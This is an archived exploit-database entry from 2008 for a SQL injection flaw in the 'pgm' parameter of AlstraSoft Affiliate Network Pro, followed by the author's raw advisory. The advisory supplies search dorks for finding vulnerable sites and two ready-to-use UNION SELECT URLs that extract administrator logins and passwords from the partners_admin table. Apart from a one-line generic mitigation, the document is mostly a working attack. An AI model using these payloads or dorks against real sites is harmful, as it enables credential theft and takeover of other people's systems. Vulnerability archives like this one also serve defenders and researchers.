AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

vendor:

Affiliate Network Pro

by:

Hussin X

CVSS

HIGH

SQL Injection

CWE

Product Name: Affiliate Network Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable parameter in the URL. The malicious query will return the admin login and password from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

|___________________________________________________|
|
|AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
|
| script : http://www.alstrasoft.com/affiliate.htm
|
| DorK   : "Affiliate Network Pro"
| DorK   : inurl:"index.php?Act=directory"
|
|___________________________________________________|

Exploit: 


www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61+from+partners_admin--

Exploit 2 :

www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin--

_____________
column_name

login
passwd
_____________



____________________________( Greetz )____________________________
|
| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
|  
|              Iraqihack | FAHD | mos_chori | Silic0n
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-07-16]